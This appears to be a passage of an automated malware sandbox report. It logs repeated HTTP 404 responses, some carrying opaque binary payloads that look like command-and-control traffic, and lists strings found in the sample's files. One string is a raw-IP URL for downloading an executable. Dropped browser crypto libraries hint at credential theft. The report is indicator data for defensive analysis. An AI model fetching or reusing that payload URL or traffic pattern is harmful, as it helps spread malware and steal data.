                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                  Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.54/file/host_so.exe
                  Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                  Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
